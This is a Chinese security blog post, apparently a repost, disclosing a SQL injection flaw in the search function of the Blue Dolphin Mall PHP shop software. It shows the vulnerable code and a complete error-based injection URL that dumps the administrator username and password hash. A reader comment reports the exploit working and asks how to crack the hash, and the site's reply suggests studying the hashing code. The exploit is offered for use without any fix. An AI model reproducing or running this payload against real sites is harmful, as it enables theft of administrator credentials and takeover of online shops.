蓝海豚商城导航注入漏洞

admin 2021年4月3日20:08:08评论48 views字数 1057阅读3分31秒阅读模式

看代码

Index.class.php:

若干………
function search_action()
        {
       
                $keyword = $_REQUEST['keyword'];
                if(empty($keyword))
                {
                        exit;
                }
………若干…
                if($_REQUEST['brand'])
                {
                        $container.="  AND brand = ".$_REQUEST['brand']; //你懂的
                        $ext['brand'] = $_REQUEST['brand'];
                }       
……若干……

test

exp:

http://127.0.0.1/index.php?act=search&keyword=1&brand=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,phpup_user.username,0x27,0x7e,phpup_user.pwd)%20from%20phpup_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1/*

留言评论(旧系统):

【匿名者】 @ 2012-03-05 03:09:32

http://lcx.cc/?FoxNews=1962.html#
看了你这个,测试成功,但是md5 怎么是21位的?如何破解?谢谢
我的邮箱 [email protected]

本站回复:

这个不太清楚,这个当时是 Cond0r 写的,时间过得久了我也记不清了,目测是参数没任何过滤,可以获取管理账号密码,至于密码为啥是21位,可能是变异的MD5这类的,最简单的方法,你下载一套这套程序,看看源码,看加密算法怎么写的,就知道了。

文章来源于lcx.cc:蓝海豚商城导航注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:08:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝海豚商城导航注入漏洞https://cn-sec.com/archives/325678.html

发表评论

匿名网友 填写信息